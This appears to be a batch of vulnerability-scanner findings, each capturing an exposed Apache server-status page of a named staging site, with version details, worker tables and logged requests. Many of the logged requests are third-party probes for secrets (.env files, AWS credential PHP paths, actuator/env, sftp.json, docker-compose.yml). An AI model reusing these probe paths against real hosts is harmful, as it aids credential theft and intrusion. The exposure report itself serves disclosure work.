127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/735. 0.00288114135070.00.002.25 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/727. 0.00288114326140.00.003.07 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/774. 0.00288114157500.00.003.30 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/723. 0.00288114030750.00.003.02 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/737. 0.00288114115650.00.002.62 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/764. 0.00288114685520.00.004.60 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/730. 0.00288114230720.00.002.21 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/748. 0.00288114160660.00.002.48 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-5517938990/23/567_ 1.02106400.00.041.25 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 2-5517938990/30/577_ 1.021019520.00.05
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2517f49056d
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Friday, 15-Aug-2025 03:23:18 CEST Restart Time: Wednesday, 13-Aug-2025 06:02:57 CEST Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 1 day 21 hours 20 minutes 20 seconds Server load: 0.07 0.03 0.00 Total accesses: 3231 - Total Traffic: 4.8 MB - Total Duration: 3085 CPU Usage: u4.81 s6.56 cu3.72 cs1.31 - .01% CPU load .0198 requests/sec - 30 B/second - 1549 B/request - .954813 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 03702779no0yes00250000 13702780no0yes10240000 Sum200 10490000 __________________________________W_______________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-237027790/1/62_ 0.0231221560.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/2/58_ 0.0610221550.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/1/58_ 0.0910221570.00.000.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/2/50_ 0.1210271410.00.010.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/2/63_ 0.0613221710.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/1/58_ 0.0913224710.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/2/50_ 0.1213271450.00.010.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/2/63_ 0.0615391580.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/1/63_ 0.0915391650.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/2/51_ 0.1115441520.00.000.07 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/2/61_ 0.0521380590.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-237027790/1/64_ 0.1027431650.00.000.11 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/2/53_ 0.0821383500.00.000.08 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/1/59_ 0.0322221530.00.000.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/2/54_ 0.0727384540.00.000.08 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/2/50_ 0.0722221350.00.010.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/1/67_ 0.0227381830.00.000.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/2/64_ 0.1122270720.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/1/54_ 0.1024432620.00.000.08 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/2/57_ 0.1121434630.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/2/55_ 0.0724381550.00.000.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/1/63_ 0.0930434620.00.000.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/2/60_ 0.0630381590.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-237027790/1/55_ 0.0324381370.00.000.07 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-237027790/1/53_ 0.0230382490.00.000.08 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-237027800/9/69_ 0.3000650.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-237027800/10/75_ 0.242861670.00.010.13 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-237027800/9/72_ 0.223380740.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1 1-237027800/10/67_ 0.282911500.00.010.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-237027800/10/75_ 0.243381650.00.020.12 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-237027800/10/75_ 0.283432670.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-237027800/9/67_ 0.224220520.00.010.08 127.0.0.1http/1.1127.0.1.1:8080GET /mysql/db/index.php?lang=en HTTP/1.1 1-237027800/11/75_ 0.234221750.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-237027800/10/69_ 0.284270570.00.020.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-2370278010/10/62W 0.1900480.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-237027800/10/77_ 0.3000860.00.020.12 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-237027800/9/66_ 0.3000570.00.010.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-237027800/10/71_ 0.22381590.00.020.11 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 1-237027800/9/69_ 0.25381540.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-237027800/9/73_ 0.29433690.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-237027800/12/75_ 0.3000750.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-237027800/9/73_ 0.201223620.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-237027800/9/76_ 0.241221750.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-237027800/9/67_ 0.3000550.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-237027800/9/72_ 0.3000640.00.010.09 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-237027800/9/72_ 0.3000680.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-237027800/9/74_ 0.3000730.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-237027800/11/72_ 0.3000680.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-237027800/10/70_ 0.281271670.00.010.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-237027800/10/73_ 0.222860770.00.020.11 127.0.0.1http/1.1127.0.1.1:8080GET /sql/webadmin/index.php?lang=en HTTP/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request Dur
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25132fcd63a
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Wednesday, 13-Aug-2025 05:06:28 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 247 Parent Server MPM Generation: 246 Server uptime: 245 days 11 hours 54 minutes 45 seconds Server load: 0.04 0.02 0.00 Total accesses: 880250 - Total Traffic: 7.8 GB - Total Duration: 104392268 CPU Usage: u621.03 s853.27 cu1116.34 cs393.05 - .0141% CPU load .0415 requests/sec - 393 B/second - 9.3 kB/request - 118.594 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 03406038no0yes1024000 13406039no0yes0025000 Sum200 1049000 _________________W________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-24634060380/6/8673_ 0.37009921250.00.01113.18 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-24634060380/8/8563_ 0.37019822540.00.0294.99 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24634060380/10/8495_ 0.341209741180.00.0279.60 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-24634060380/6/8549_ 0.321219612510.00.0184.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24634060380/7/8534_ 0.371719753020.00.0189.21 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24634060380/10/8517_ 0.34228110341460.00.0287.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24634060380/7/8613_ 0.3122819798720.00.0292.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24634060380/8/8641_ 0.37233110194570.00.01129.02 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24634060380/9/8607_ 0.2931209886900.00.0197.80 127.0.0.1http/1.1127.0.1.1:8080GET /.DS_Store HTTP/1.1 0-24634060380/9/8563_ 0.31312310276710.00.03112.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24634060380/9/8584_ 0.3731719665120.00.0279.78 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24634060380/9/8600_ 0.2982869858710.00.0295.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-24634060380/7/8541_ 0.3182829545970.00.0183.60 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24634060380/8/8530_ 0.37833310044400.00.01106.78 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24634060380/10/8603_ 0.2894409420520.00.02119.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-24634060380/8/8466_ 0.3094419615400.00.0192.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24634060380/7/8537_ 0.3694909645090.00.0188.68 127.0.0.1http/1.1127.0.1.1:8080GET /developmentserver/metadatauploader HTTP/1.1 0-246340603810/8/8565W 0.28009645420.00.01115.16 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-24634060380/9/8592_ 0.38009842750.00.0282.66 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-24634060380/8/8609_ 0.38009550830.00.0197.23 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-24634060380/6/8513_ 0.38009610650.00.0198.97 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-24634060380/10/8558_ 0.38009704570.00.02134.86 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-24634060380/7/8621_ 0.38009971020.00.0186.31 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-24634060380/9/8516_ 0.38009685350.00.0291.09 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-24634060380/9/8507_ 0.380010124450.00.02106.89 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-24634060390/2/10601_ 0.19151617805520.00.0070.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/5/10577_ 0.13202817852840.00.0172.87 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-24634060390/4/10574_ 0.16202847414270.00.0074.74 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-24634060390/6/10632_ 0.14121117918540.00.0275.64 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/3/10584_ 0.19113317887240.00.0074.13 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-24634060390/3/10612_ 0.17112817662540.00.0172.70 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/6/10620_ 0.15112837764800.00.0172.28 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-24634060390/4/10529_ 0.1991718976650.00.0181.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/5/10658_ 0.1791217876290.00.0172.52 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/6/10521_ 0.1591218046830.00.0274.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/3/10517_ 0.16151107652110.00.0170.01 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-24634060390/4/10526_ 0.2061717788100.00.0271.72 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/5/10577_ 0.1761247744800.00.0173.87 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-24634060390/5/10463_ 0.13151137936760.00.0170.75 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-24634060390/7/10589_ 0.1561208094430.00.0169.79 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-24634060390/2/10560_ 0.191216110439870.00.0079.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/3/10549_ 0.2053447265110.00.0171.52 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-24634060390/3/10505_ 0.16121118284120.00.0173.35 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/2/10539_ 0.1752918066510.00.0074.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/6/10487_ 0.1552907803400.00.0173.78 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/5/10509_ 0.209317960800.00.0170.30 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/2/10612_ 0.178817917830.00.0070.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/4/10497_ 0.168818054760.00.0170.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24634060390/4/10529_ 0.13211108320680.00.0072.36 127.0.0.1http/1.1127.0.1.1:8080GET /crm/.env.bak HTTP/1.1 1-24634060390/2/10531_ 0.19203328023320.00.0070.34 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 2-242-0/0/8420. 0.002775820
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25124ddc249
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Sunday, 10-Aug-2025 19:14:13 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 244 Parent Server MPM Generation: 243 Server uptime: 243 days 2 hours 2 minutes 30 seconds Server load: 0.00 0.00 0.00 Total accesses: 870263 - Total Traffic: 7.7 GB - Total Duration: 104087522 CPU Usage: u616.32 s845.76 cu1097.88 cs387.75 - .014% CPU load .0414 requests/sec - 391 B/second - 9.2 kB/request - 119.605 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 02938559no0yes1024000 12938655no0yes0025000 Sum200 1049000 _________________W________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-24329385590/14/8423_ 0.74019847840.00.03111.13 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24329385590/14/8328_ 0.7324109743180.00.0292.94 127.0.0.1http/1.1127.0.1.1:8080GET /.env.old HTTP/1.1 0-24329385590/16/8245_ 0.75009677090.00.0277.71 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-24329385590/17/8290_ 0.75009476350.00.0477.85 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-24329385590/13/8281_ 0.75009695150.00.0187.07 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-24329385590/16/8268_ 0.750010279780.00.0285.32 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-24329385590/19/8363_ 0.75009719110.00.0490.42 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-24329385590/14/8387_ 0.750010022250.00.02126.81 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-24329385590/13/8349_ 0.749819796810.00.0395.40 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24329385590/15/8305_ 0.73241010147920.00.03109.92 127.0.0.1http/1.1127.0.1.1:8080GET /.env.bak HTTP/1.1 0-24329385590/17/8333_ 0.75009592000.00.0277.61 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-24329385590/12/8347_ 0.7324609679990.00.0293.19 127.0.0.1http/1.1127.0.1.1:8080GET /public/config/aws.php HTTP/1.1 0-24329385590/17/8286_ 0.7324609443960.00.0381.20 127.0.0.1http/1.1127.0.1.1:8080GET /public/secrets.php HTTP/1.1 0-24329385590/14/8275_ 0.7026419965500.00.02104.57 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24329385590/11/8354_ 0.6726439348700.00.01117.54 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24329385590/15/8221_ 0.75009560660.00.0386.87 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-24329385590/15/8289_ 0.7324609560150.00.0286.51 127.0.0.1http/1.1127.0.1.1:8080GET /public/aws.php HTTP/1.1 0-243293855910/12/8324W 0.73009596980.00.01113.21 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-24329385590/15/8340_ 0.7324609711440.00.0280.26 127.0.0.1http/1.1127.0.1.1:8080GET /public/aws_credentials.php HTTP/1.1 0-24329385590/15/8357_ 0.7326909478330.00.0293.65 127.0.0.1http/1.1127.0.1.1:8080GET /docker-compose.yml HTTP/1.1 0-24329385590/17/8265_ 0.7324609575860.00.0296.69 127.0.0.1http/1.1127.0.1.1:8080GET /public/credentials.php HTTP/1.1 0-24329385590/13/8301_ 0.7324609654540.00.02132.52 127.0.0.1http/1.1127.0.1.1:8080GET /public/config/aws_credentials.php HTTP/1.1 0-24329385590/14/8368_ 0.739309873640.00.0382.09 127.0.0.1http/1.1127.0.1.1:8080GET /config/config.env HTTP/1.1 0-24329385590/15/8259_ 0.7324609583260.00.0389.00 127.0.0.1http/1.1127.0.1.1:8080GET /public/config/secrets.php HTTP/1.1 0-24329385590/15/8253_ 0.7393010075100.00.02100.12 127.0.0.1http/1.1127.0.1.1:8080GET /app/.env HTTP/1.1 1-24329386550/39/10449_ 1.5525307783130.00.0769.77 127.0.0.1http/1.1127.0.1.1:8080GET /storage/framework/cache/data/aws_secrets_cache.php HTTP/1. 1-24329386550/37/10431_ 1.5525307835500.00.0771.35 127.0.0.1http/1.1127.0.1.1:8080GET /tests/aws_credentials.php HTTP/1.1 1-24329386550/33/10421_ 1.5525307368050.00.0573.23 127.0.0.1http/1.1127.0.1.1:8080GET /tests/aws_test.php HTTP/1.1 1-24329386550/37/10474_ 1.5525307891110.00.0674.26 127.0.0.1http/1.1127.0.1.1:8080GET /tests/AwsIntegrationTest.php HTTP/1.1 1-24329386550/34/10440_ 1.5525307859760.00.0573.22 127.0.0.1http/1.1127.0.1.1:8080GET /tests/AwsServiceTest.php HTTP/1.1 1-24329386550/34/10465_ 1.5525307624870.00.0471.63 127.0.0.1http/1.1127.0.1.1:8080GET /tests/aws.php HTTP/1.1 1-24329386550/41/10469_ 1.5525307739120.00.0570.54 127.0.0.1http/1.1127.0.1.1:8080GET /tests/aws_config.php HTTP/1.1 1-24329386550/39/10386_ 1.5525308932370.00.0679.67 127.0.0.1http/1.1127.0.1.1:8080GET /tests/aws_secrets.php HTTP/1.1 1-24329386550/36/10508_ 1.5525307864950.00.0571.43 127.0.0.1http/1.1127.0.1.1:8080GET /tests/aws_keys.php HTTP/1.1 1-24329386550/39/10373_ 1.5525308025930.00.0673.88 127.0.0.1http/1.1127.0.1.1:8080GET /public/aws_config.php HTTP/1.1 1-24329386550/30/10366_ 1.5524807614320.00.0368.83 127.0.0.1http/1.1127.0.1.1:8080GET /app/aws_credentials.php HTTP/1.1 1-24329386550/37/10373_ 1.5525307764820.00.0570.67 127.0.0.1http/1.1127.0.1.1:8080GET /app/Secrets/aws_keys.php HTTP/1.1 1-24329386550/37/10429_ 1.5524807728180.00.0672.16 127.0.0.1http/1.1127.0.1.1:8080GET /app/aws.php HTTP/1.1 1-24329386550/34/10323_ 1.5518117905950.00.0569.75 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-24329386550/35/10443_ 1.5517608060280.00.0668.72 127.0.0.1http/1.1127.0.1.1:8080GET /app/Providers/AwsServiceProvider.php HTTP/1.1 1-24329386550/31/10416_ 1.55176010412920.00.0578.78 127.0.0.1http/1.1127.0.1.1:8080GET /app/Config/aws.php HTTP/1.1 1-24329386550/34/10395_ 1.551707214730.00.0670.14 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-24329386550/37/10354_ 1.551208241550.00.0572.02 127.0.0.1http/1.1127.0.1.1:8080GET /app/Config/credentials.php HTTP/1.1 1-24329386550/35/10392_ 1.551207960870.00.0573.22 127.0.0.1http/1.1127.0.1.1:8080GET /app/Config/secrets.php HTTP/1.1 1-24329386550/36/10331_ 1.5525307704350.00.0672.58 127.0.0.1http/1.1127.0.1.1:8080GET /app/Config/aws_secrets.php HTTP/1.1 1-24329386550/40/10367_ 1.5525307942940.00.0669.36 127.0.0.1http/1.1127.0.1.1:8080GET /app/Config/aws_keys.php HTTP/1.1 1-24329386550/36/10475_ 1.5525307890590.00.0668.75 127.0.0.1http/1.1127.0.1.1:8080GET /app/Secrets/aws.php HTTP/1.1 1-24329386550/32/10347_ 1.5525308040180.00.0569.09 127.0.0.1http/1.1127.0.1.1:8080GET /app/Secrets/aws_credentials.php HTTP/1.1 1-24329386550/36/10382_ 1.5525308302640.00.0571.47 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2511fcbc6ea
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Friday, 08-Aug-2025 15:50:42 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 242 Parent Server MPM Generation: 241 Server uptime: 240 days 22 hours 38 minutes 59 seconds Server load: 0.00 0.00 0.00 Total accesses: 867361 - Total Traffic: 7.7 GB - Total Duration: 104081600 CPU Usage: u611.36 s838.7 cu1092.91 cs385.84 - .0141% CPU load .0417 requests/sec - 395 B/second - 9.3 kB/request - 119.998 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 02640285no0yes0025000 22640284no0yes1024000 Sum200 1049000 _________________________.........................______________ _________W_..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-24126402850/29/8366_ 0.88262809847100.00.05111.03 127.0.0.1http/1.1127.0.1.1:8080GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.1 0-24126402850/31/8277_ 0.86262309742550.00.0692.84 127.0.0.1http/1.1127.0.1.1:8080GET /indice.jsa HTTP/1.1 0-24126402850/27/8191_ 0.86262309676410.00.0377.63 127.0.0.1http/1.1127.0.1.1:8080GET /main.jhtml HTTP/1.1 0-24126402850/30/8229_ 0.88262309475430.00.0577.71 127.0.0.1http/1.1127.0.1.1:8080GET /devicedesc.xml HTTP/1.1 0-24126402850/28/8226_ 0.86261809694240.00.0486.98 127.0.0.1http/1.1127.0.1.1:8080GET /index.cfm HTTP/1.1 0-24126402850/27/8215_ 0.882587510278860.00.0585.21 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24126402850/27/8307_ 0.86261809718180.00.0590.32 127.0.0.1http/1.1127.0.1.1:8080GET /inicio.php HTTP/1.1 0-24126402850/32/8333_ 0.862582010021400.00.06126.72 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 0-24126402850/25/8300_ 0.8978749796060.00.0495.30 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24126402850/26/8252_ 0.862582010147260.00.04109.79 127.0.0.1http/1.1127.0.1.1:8080GET /default.html HTTP/1.1 0-24126402850/29/8272_ 0.8678209591280.00.0677.50 127.0.0.1http/1.1127.0.1.1:8080GET /start.aspx HTTP/1.1 0-24126402850/29/8298_ 0.8678209679090.00.0793.02 127.0.0.1http/1.1127.0.1.1:8080GET /default.jhtml HTTP/1.1 0-24126402850/29/8225_ 0.8748209443240.00.0481.07 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-24126402850/26/8221_ 0.86480009964640.00.05104.41 127.0.0.1http/1.1127.0.1.1:8080GET /menu.aspx HTTP/1.1 0-24126402850/28/8306_ 0.8948729348010.00.05117.45 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24126402850/28/8161_ 0.86326509559670.00.0586.75 127.0.0.1http/1.1127.0.1.1:8080GET /inicio.aspx HTTP/1.1 0-24126402850/30/8239_ 0.87318719559380.00.0586.42 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-24126402850/26/8273_ 0.86318209596300.00.04113.11 127.0.0.1http/1.1127.0.1.1:8080GET /home.html HTTP/1.1 0-24126402850/26/8287_ 0.8748219710810.00.0580.17 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-24126402850/28/8301_ 0.86318209477560.00.0393.55 127.0.0.1http/1.1127.0.1.1:8080GET /indice.aspx HTTP/1.1 0-24126402850/26/8203_ 0.86480009575140.00.0696.57 127.0.0.1http/1.1127.0.1.1:8080GET /main.asp HTTP/1.1 0-24126402850/32/8243_ 0.88262819653620.00.07132.42 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24126402850/29/8314_ 0.87327019872790.00.0681.96 